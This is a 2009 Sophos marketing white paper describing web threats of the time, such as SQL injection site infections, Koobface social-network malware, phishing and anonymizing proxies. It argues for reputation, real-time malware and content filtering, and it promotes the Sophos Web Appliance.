You are on page 1of 8

Enabling a safer internet: The positive approach to web security

With one new infected webpage discovered every 4.5 seconds, there is no longer any such thing as a “trusted website”. As the internet becomes an increasingly missioncritical tool, new media such as blogs and social networking sites are a necessary part of business. This paper describes today’s new web threats, highlights the need for a positive security model to replace yesterday’s access-blocking approach, and describes the three pillars of protection organizations need to safeguard their systems and resources.

A Sophos white paper

April 2009

Sophos security threat report 20091  . One newly infected webpage is discovered every 4. The only criterion is that the website has vulnerabilities that the hacker can exploit. silently recruit the host system into a botnet – a network of hijacked computers for distributing further malware. spyware.2 In addition to significant security and financial risks.5 seconds. Thousands of systems are infected in this way every day and the activity is particularly lucrative for the criminals – a single compromised computer can give access to thousands of confidential records. the intention being to surreptitiously steal confidential information directly. staff inefficiency and further security (and legal) risk if sensitive company or personal data is posted online. worse. and even billions. or spam. At the same time uncontrolled web browsing can have serious productivity implications with unauthorized surfing potentially causing network slowdown. Large. This web-based malware is then able to exploit social engineering tactics or browser vulnerabilities to infect visitors. install further malicious code or. of dollars. Exploiting legitimate. hackers are able to covertly inject malicious code into more and more legitimate sites. This significant security risk can be extremely costly to businesses. There are also ramifications if users violate third-party licenses through illegal MP3. more established brands with high traffic volumes are very attractive to cybercriminals but smaller organizations are equally likely to fall victim. The techniques used continue to evolve rapidly and this paper now looks at what the hackers are up to today. organizations are having to deal with the legal implications of security breaches.1 the web is now the number one vector of attack for cybercriminals. film and software downloads. with some estimates for a data breach estimated at millions. Organizations can be legally liable if their computers are used to view pornography or hate material or to incite illegal behavior. trusted brands Hackers don’t tend to discriminate between websites.5 seconds. particularly the ever-increasing capability for user-submitted content.A Sophos white paper Enabling a safer internet: the positive approach to web security Enabling safer surfing: The positive approach to web security Web-based malware: the new weapon With one new web page infected every 4. Taking advantage of web infrastructure vulnerabilities.

hi5.9 The malware works by directing your “friends” on your socialnetworking site to click on a link to another site purporting to contain a video clip. When user input. GeoCities. from which malicious software is downloaded. The aim is to serve up malware specifically tailored to the networks of which you’re known to be a member (though in fact to date these links all result in the same executable). which tried to download spyware. Hackers have found value in compromising Facebook accounts. New gateways for cybercrime The new freedoms opened up by the web. Facebook admitted that up to 1800 users had had their profiles defaced by an attack that secretly installed a Trojan while displaying an animated graphic of a court jester blowing a raspberry.7 One particularly active threat is Koobface. blurring the lines between work and social interaction and offering easy ways to share information. and its rapid evolution demonstrates the wide range of social networks that are vulnerable. • BusinessWeek magazine – one of the 1000 busiest websites – which attempted to download malware from a Russian-based server. Blogs. stealing usernames and passwords. Please Contact Support”. Friendster and Tagged.10 The websites to which victims are directed use a script to check which of these social networking sites has sent them there. a family of worms. putting visitors Recovery from a SQL injection attack can be difficult. Unsuspecting victims then receive emails with links to the blog.3 • An area of the Adobe website designed to offer support to video bloggers.5 • Sony’s US PlayStation website. the code peppers the database with malicious instructions. If they are tricked into downloading an executable to watch the video at the third-party website. Websites that have been attacked in this way include: launching pad for mass-distributing malware attacks and spam. micro-blogs and hackers Hackers are also targeting other social media such as blogs. they are using free blogging services to create infected blogs.4 at risk from a scareware attack. People who have learned to be suspicious of email links are on the whole less savvy about links posted on Facebook and the like.8 Initially targeting Facebook and MySpace. for instance via a web form. is not correctly filtered or checked. a message is displayed: “Error installing Codec.A Sophos white paper Enabling a safer internet: the positive approach to web security Infecting trusted sites with SQL injection attacks One of the main threats comes from SQL injection attacks. Koobface now targets a more diverse set of social networks. In much the same way that they set up malicious pages on fake websites and then use social engineering techniques to lure visitors to them. including MySpace. have opened up new loopholes for cybercriminals to exploit. and then using the profiles as a  . Social networking sites A favorite target for today’s hackers are social networking websites. and there are numerous cases of website owners cleaning up their database only to be hit again a few hours later. Bebo. The malware then accesses Facebook/ MySpace/etc to spread itself further.6 In August 2008. Such attacks exploit security vulnerabilities and insert malicious code (in this case script tags) into the database running a site.

In January 2009.A Sophos white paper Enabling a safer internet: the positive approach to web security At the same time. among others. There is also a growing number of unknown private anonymizing proxies setup and maintained by individuals or small groups for their own use. which has begun to be targeted. of course. exploited by criminals. Anonymizing proxies bypass URL filtering and create enormous security vulnerabilities. which dramatically increases the chance of infection. Twitter. This has motivated many users to respond by using anonymizing proxies which disguise the true nature of a website in order to trick an organization’s web filter into allowing access.12 • Gaming community The Valve Steam network • Paypal An unusual type of phishing attack spammed out malware within a RAR attachment. tedious. There are even anonymizing proxies that are themselves.11 Two months later hundreds of Twitter users were hit when messages were sent from compromised accounts trying to drive traffic to a pornographic website. but a difficult. Anonymizing proxies are big business in the underground economy.14 • Security: If users are browsing via anonymizing proxies. This makes it extremely easy for users to access any site they want through an anonymizing proxy. A common misconception is that phishing is just a banking problem. and dedicated websites. It remains. Bebo and a wide range of other networks and enterprises. they might also be circumnavigating content scanning at the perimeter. then in addition to bypassing URL filtering. Fox News and Barack Obama.  . forums. and are. A handful of examples from February and March 2009 alone demonstrate the scale of the problem. and time-consuming task for administrators to track and block them. such as MySpace. a banking problem but it is now also a problem for social networking sites. were broken into. vulnerabilities in common legitimate blogging platforms – just like any other platform – can be. Anonymizing proxies hold significant risks for organizations: The spread of the phishing net Phishing attacks – whereby unsuspecting users are directed to to a bogus login page which requests their username and password – continue to be a significant threat. driven by advertising revenues and subscription fees. Twitter’s internal systems were hacked and the accounts of Britney Spears. either accidentally or deliberately. Facebook.16 was targeted by a phish offering add-ons for the new zombie shooter Left 4 Dead.15 • HMRC The passing of the deadline for submitting tax returns to HM Revenue & Customs in the UK prompted a phish. Hundreds of new anonymizing proxies are created daily and distributed via blogs. Of note is the micro-blogging site.17 The risks posed by anonymizing proxies Many organizations have responded to the growing web threat by using URL filtering to curtail internet browsing.13 • iStockphoto a phishing attack was perpetrated across iStockphoto’s online forums and via the site’s mail system. infected with malware. • Google A phishing campaign spread via the Google Talk chat system.

forums and media portals have all become important instruments for employee recruitment. the risks presented by allowing unfettered access to the web are enormous. In addition to good preventive practices. To prevent users from bypassing filtering controls. viral marketing. as could the sharing of confidential information over the internet. public relations. the fact that traffic from these sites is not blocked and that malware. and are an established and proven tool for successfully protecting against already known and located web-based threats. regular intervals automatically inspects traffic for signs that it’s being routed through a proxy. will be allowed into an organization. social networking sites rather than working. Social networking sites.A Sophos white paper Enabling a safer internet: the positive approach to web security • Liability: Unrestricted access to inappropriate material or illegal downloads could have serious legal ramifications for an organization. A new approach to web security and control is required that fully supports the needs of business. by filtering URLs based on their reputation as “good” or “bad”. sites that have become hijacked. they offer no protection against malware hosted on legitimate. they help optimize network performance and staff productivity by blocking access to illegal. inappropriate or nonbusiness-critical web content. • A real-time proxy detection engine that  . their organization’s web filter means they could spend all day on. regularly updated databases of sites known to host malware or suspicious content. • A reputation-based service that actively seeks out new anonymizing proxies as they are published and updates the filtering database at frequent. comprising three key pillars of protection: • Reputation-based filtering • Real-time predictive malware filtering • Content-based filtering. customer interaction. the following two components are critical in forming a defense against anonymizing proxy use: • Productivity: The ability for users to bypass The three pillars of modern web protection Internet access creates a dilemma for network administrators – on the one hand. and readily exploit. and research – they cannot be blocked without seriously impacting business productivity and effectiveness. As well as providing this basic form of preventive protection. blogs. pillar one Reputation-based filtering Reputation-based filters are the first critical component in the fight against web-based threats. Although traditional URL filters often connect to vast. They prevent access to a catalog of sites that are known to have hosted malware or other unwanted content. for example. they have several significant shortcomings. such as rigorous patching and educating users about the risks of browsing. equipping users with the tools they need to be more effective while eliminating the associated risks of potential infection from trusted legitimate sites. effectively closing the door on private proxies or other proxies not identified through the reputation service. yet the internet is undeniably becoming a mission-critical business tool. whether new or old. Another significant shortcoming of traditional URL filters is that they often lack an effective solution to deal with the enormous issue of anonymizing proxies. Cybercriminals are well aware of. previously safe. it is vital that organizations implement a comprehensive web security solution. Neither do they protect against malware on newly created websites. and consume valuable network bandwidth. In particular.

and information returning from. the web server are scanned. All web traffic passes through a scanner designed to identify both known and newly emerging zero-day malware. hardware and traffic health? administrator? Via email? Via phone call? to assure the system is available 24/7? pillar three Content-based filtering Content-based filtering analyzes all web traffic on the network to determine the true filetype of content coming back from a website and can allow or disallow this traffic. Others who are fairly recent entrants to the market claim comprehensive solutions but lack the evidence to prove they are delivering fully proactive protection. In addition to detecting known malware as it moves across legitimate sites. • Do you provide real-time uptime monitoring  . It is worth noting that this type of real-time scanning has a further advantage over traditional URL filters. Many security vendors are currently relying on signatures alone. irrespective of its reputation or category. the traffic is scanned using a combination of signatures and behaviorbased technologies. or rely on the extension or the MIME-type? • Do you scan HTTPS-encrypted traffic? • Can you demonstrate real research expertise in web threats? • Do you have independent statistics of your proactive web threat detection rates? see how easy it is to use? • Can I see a demo of the admin console to • Are there on-board monitors to track • How are issues reported to the software. based on corporate policy. The malware engine is optimized for low-latency scanning and whenever a user accesses a website. this bi-directional filtering can also provide protection against new threats regardless of where they are hosted. bi-directional – both the user request to. almost by definition. in that the filtering is. • Does the URL database used for your reputation-based filtering have global coverage? cover new threats? identified daily? in real-time? • How frequently is your product updated to • How many new threat-hosting sites are • Do you scan all incoming traffic for malware • Do you use your own technology for malware scanning or rely on third-parties? • Is your malware scanning engine signaturebased or does it use behavioral analysis? malware filtering? malware filtering? catalog daily? • Is there an additional cost for real-time • Is there a performance impact for real-time • How many anonymizing proxies do you • Does your solution identify anonymizing proxy use in real time? • Do you analyze the true content of files. The use of real-time predictive threat filtering remains uncommon amongst many of the leading web filtering security solutions in the market today.A Sophos white paper Enabling a safer internet: the positive approach to web security Key questions to ask a prospective vendor pillar two Real-time predictive malware filtering Real-time predictive malware filtering goes a long way to closing the gap left by reputationbased filters.

Many firms already have procedures in place that define which websites are considered appropriate.TXT extension but in fact be an executable file. or they open a file that does nothing. and since web browsing is integral to most businesses’ day-to-day activities. this pillar of protection enables organizations to create policies around a variety of content types that can be used to send malware. have a . effective administration. and accessibility will ultimately fail the organization. efficiency. User education as a tool for defense Many businesses have successfully educated users about how to spot email-borne threats. thereby reducing the risks of infection. for example. such as their computer suddenly becoming slow. Content-based filtering also improves bandwidth optimization by blocking large or resource-hungry content. rather than simply looking at the file extension or the MIME-type reported by the web server.A Sophos white paper Enabling a safer internet: the positive approach to web security Content filters scan the actual content of a file. A file might. and open access to the tools and sites they need must be met.  . control. such as streaming video. but few have updated these to include guidance on how to avoid infection whilst surfing the net. At the same time end-user expectations and requirements for speed. Solutions which fail to meet these demands for security. A good policy will dictate that: • Employees must never open spam emails • Employees must never click on links included in emails sent from unknown senders browsers are patched at all times • IT must ensure that the organization’s web • Employees should minimize their nonwork-related browsing for both security and productivity reasons. and so can identify and block files that are masquerading as innocent/allowed filetypes but really contain unauthorized content. users can and should be engaged in the fight. By enabling enforcement of only businesstype content. the web gateway must be equipped with a security solution that enables business and users to be productive while providing the security essential to ensure a riskfree experience. and while the fight against web-based threats relies much more heavily on sophisticated technology. Conclusion Every minute of every day. Users can also be encouraged or required to report unusual behavior. or the homepage changing when they open their browser with no input from them. cybercriminals are looking to exploit web traffic for commercial gain. performance. For example Windows executables or screensavers might be disallowed. Organizations looking to protect against the growing threat of web-based malware need a solution that above all demonstrates its security attributes and combines powerful site and content controls with low-impact.

html 16�www.sophos.A Sophos white paper Enabling a safer internet: the positive approach to web security Sources 1� Sophos security threat report. and content-based filtering.com/blogs/gc/g/2009/01/07/celebrity-twitter-accounts-hacked 12�www.com/blogs/gc/g/2008/08/04/facebook-and-myspace-malware 11�www. part of Web Security and Control.com/blogs/gc/g/2008/09/17/facebook-malware-is-a-real-threat 7� www. productive web browsing.com/pressoffice/news/articles/2008/07/playstation.com/blogs/gc/g/2008/08/07/more-malicious-links-seen-on-facebook 8� www.sophos. phishing.html 6� www. All rights reserved.sophos.com/blogs/gc/g/2008/09/15/hackers-infect-businessweek-website-via-sql-injection-attack 4� www.sophos.com/threats?chapter=162971949&id=207784708 3� www.sophos.com/products/enterprise/free-trials for a free 30-day trial. threats and user behavior. USA | Oxford. UK © Copyright 2009.com/security/blog/2009/02/3426.sophos.pdf 2� www. searching for and blocking anonymizing proxies.sophos.sophos.sophos.html 10�www. blocks spyware. As a managed appliance. viruses.sophos. Sophos Plc.html Sophos solution The Sophos Web Appliance. and enabling comprehensive web access control for safe.html 9� www. real-time predictive threat filtering.com/pressoffice/news/articles/2008/10/adobe-infection. 2009. enable secure browsing without the complexity of traditional web filters.sophos. It features an innovative.html 5� www. the Sophos Web Appliance features remote “heartbeat” monitoring and on-demand remote assistance. ensuring it delivers the most dependable web security in the industry. Visit www.sophos.sophos.com/blogs/gc/g/2009/03/06/chatwebcamfree-attack-hits-twitter-users 13� www.infowatch. fullspectrum scanning engine that detects all threats through a unique combination of reputation-based filtering. tr/090320 .sophos.com/security/analyses/viruses-and-spyware/w32koobfagen.com/security/blog/2009/02/3215.html 17�www.com/blogs/gc/g/2009/03/04/istockphoto-struck-phishing-attack 15�www.sophos. Its easy-to-use management console and powerful reporting tools that deliver rapid insight into web traffic. malware and unwanted applications at the gateway. secure.sophos.com/blogs/gc/g/2009/02/25/gmail-users-hit-viddyho-phishing-chat-attack 14�www.com/security/blog/2009/02/3071.sophos.com/security/blog/2009/02/3287. All trademarks are the property of their respective owners.com/sophos/docs/eng/marketing_material/sophos-security-threat-report-jan-2009-na. Boston.